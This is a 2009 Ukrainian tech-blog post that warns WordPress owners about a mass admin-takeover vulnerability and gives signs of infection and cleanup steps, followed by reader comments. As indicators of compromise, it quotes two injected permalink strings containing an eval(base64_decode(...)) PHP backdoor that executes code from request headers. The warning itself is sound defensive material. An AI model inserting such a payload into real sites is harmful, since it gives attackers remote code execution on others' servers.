• Про Watcher
  • Реклама
  • Статистика Уанету
  • Повідомити новину
  • Соцмедіа для Журналістів
про інтернет бізнес та маркетинг в соціальних медіа
  • Соціальні Медіа
    • Facebook
    • Twitter
    • ВКонтакте
    • Блогосфера
    • Новини Соціальних Медіа
  • Бізнес
    • Інвестори
    • Бізнесновини
    • Держава
    • Реклама і Маркетинг
    • Стартапи
  • Mobile
    • Android
    • iPhone
    • Nokia
    • Windows Mobile
    • Мобільні новини
  • Google
    • Gmail
    • YouTube
    • Новини Google
    • Пошук Google
  • Яндекс
    • Новини Яндекса
    • Яндекс.Карти
    • Яндекс.Пошук
  • Технології
    • Інтернет
    • Гаджети
    • Новини технологій
    • Телеком
  • HowTo
  • Політики в інтернеті
    • Закордоном
    • Українські політики
  • Розваги і Медіа
    • Ігри
    • Вірусне відео
    • Знаменитості
    • Медіа
  • Різне
    • Анонси
    • Гумор
    • Дайджест
    • Дизайн і програмування
    • Люди
    • Останні статті

Максим Саваневський · 9 Вересня 2009

УВАГА! Критична вразливість блогів на WordPress

Tweet
Tweet

Думаю, що переважна більшість власників блогів на движку WordPress вже чули про критичну вразливість, від якої постраждали вже десятки тисяч блогів в світі. Серед них чимало відомих.

Сьогодні мав кілька розмов, під час яких виявилось, що переважна більшість українських власників блогів на WordPress, які вчасно не проапгрейдились до останньої версії – мають проблему з зараженим сайтом.

Як відбувається зараження? Спершу відбувається реєстрація нового користувача. Потім через діру в безпеці движка цей користувач отримує права адміністратора та контроль над сайтом. Далі починає тихенько додавати спам та свої посилання на зовнішній контент в архівних записах блогу.

Про проблему можуть не переживати лише ті, в кого остання версія движка – WordPress 2.84. Там діра залатана.

Хоча про проблему стало відомо ще 5 вересня, більшість власників блогів досі нічого не зробили задля уникнення проблем.

Існує кілька ознак, які свідчать про взлом блогу. Перша – це збільшення кількості адміністраторів блогу. Причому зловмисники використовують JavaScript, щоб приховати нового адміністратора. Якщо сайт заражений, то ви побачите лише збільшення кількості адміністраторів, але не побачите їх в переліку адмінів.

Друга ознака – зміна в структурі постійних посилань (permalinks). Там може з’явитись ось такий код:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

або такий:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Що робити? Перше – якщо жодних ознак взлому нема – терміново проапгрейдитись до найсвіжішої версії WordPress.

Якщо ознаки взлому є, то:
1. Зайти в адмінпалень в розділ Setting, далі – Permalinks і знищити лишній код (зазначений вище).

2. З‘ясувати порядковий номер останнього зареєстрованого на блозі користувача. Найпростіший варіант – це додати загальну кількість всіх користувачів по розділах (наприклад, читачі, автори, адміни). Далі зайти в редагування даних будь-якого з користувачів і в командній стрічці, де прописується “ID=”, вставляємо отриману вами цифру, але збільшуємо на одиницю. По ідеї ви маєте потрапити на вашого нового адміна. Якщо цього не відбулось, а там якийсь інший користувач, збільшість ID ще не одиницю, і так продовжуйте, поки не дійдете до нього.

3. В профайлі цього користувача (в полі ІМ’Я) ви побачите дивний код (javascript) та права адміна. Необхідно видалити спершу код, далі понизити його в правах до простого користувача.

4. Перейдіть до переліку користувачів. Тепер ви можете спокійно побачити вашого шкідника серед інших користувачів. Знайшли? Видаляйте.

Лише після цього можна встановлювати новий WordPress 2.84. Щодо вашої бази даних. Якщо в ній вже встигли покопатись, і деякі постійні посилання були замінені – доведеться вручну правити базу даних. Або сподіватись на якусь утиліту, яку викладуть на wordpress.org.

Читати більше про: wordpress

Максим Саваневський
Керуючий партнер PlusOne DA. Засновник Watcher.

Максим Саваневський на зв'язку

Блог автора Twitter Facebook LiveJournal

Також читайте:
  • Вийшла нова версія WordPress 3.5 «Елвін»

    Вийшла нова версія WordPress 3.5 «Елвін»

  • Facebook запустив Facebook for WordPress plugin

    Facebook запустив Facebook for WordPress plugin

  • Для WordPress запустили неофіційний App Store

    Для WordPress запустили неофіційний App Store

  • Wikipedia, WordPress та інші сайти поринули в темряву, протестуючи проти закону SOPA

    Wikipedia, WordPress та інші сайти поринули в темряву, протестуючи проти закону SOPA



  • Andriy Bidochko

    WordPress Shit Sucks! Many Times!
    I’ve purged it from my sandbox server long time ago since constant WP vulnerabilities/hacks just drove me nuts!
    Anyway, thanks for instructions how to clean a mess for an average Joe!

  • askold.uaix

    12 000-чам юзерів в світі це вже не допоможе, свій акк вони втратили.

  • Serjart

    Я зазвичай відразу оновлююсь на нову версію вордпрессу тому, що постійно пишуть про вразливість попередньої. :D Через це інколи думав перейти на якийсь більш стабільний та не дірявий двигунець для блогінгу.

  • Олексій

    Перейти на більш не дірявий – але ж він зручний. Та і в інших дірки також є. Дуже цікава стаття, відразу обновив, на всяк випадок)

Отримувати новини електронною поштою


Реклама реклама

Маєш новину? Повідом нам

Позначки

Android apple Facebook gmail Google Google+ google maps Inmind Instagram iPad iphone livejournal mail.ru microsoft Twitter uastat video vkontakte YouTube Євромайдан Блоги Київстар Одноклассники Приватбанк СБУ США Твітер Яндекс безпека вибори додатки дослідження пошук рейтинг реклама росія соціальні мережі статистика уанет україна хакери ігри інтернет інтернет реклама інфографіка
© Всі права застережено.
NIC.UA